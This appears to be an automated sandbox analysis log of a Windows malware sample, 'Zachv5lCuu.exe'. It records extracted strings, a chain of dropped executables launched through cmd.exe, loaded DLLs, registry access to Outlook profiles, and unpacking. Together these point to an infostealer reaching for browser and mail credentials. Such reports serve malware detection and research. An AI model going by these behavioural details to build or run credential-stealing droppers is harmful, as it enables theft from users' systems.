Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Zachv5lCuu.exe, 00000000.00000003.1368780238.0000000023644000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000003.1382565021.0000000023636000.00000004.00000020.00020000.00000000.sdmp, KFIJEGCBGIDGHIDHDGCB.0.dr, JEGDGIIJJECFIDHJJKKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Zachv5lCuu.exe ReversingLabs: Detection: 55%
Source: GHCGDAFCFH.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File read: C:\Users\user\Desktop\Zachv5lCuu.exe
Source: unknown Process created: C:\Users\user\Desktop\Zachv5lCuu.exe "C:\Users\user\Desktop\Zachv5lCuu.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: Zachv5lCuu.exe Static file information: File size 2452992 > 1048576
Source: Zachv5lCuu.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x213a00
Source: Binary string: mozglue.pdbP source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\Zachv5lCuu.exe Unpacked PE file: 0.2.Zachv5lCuu.exe.cd0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Unpacked PE file: 9.2.GHCGDAFCFH.exe.670000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
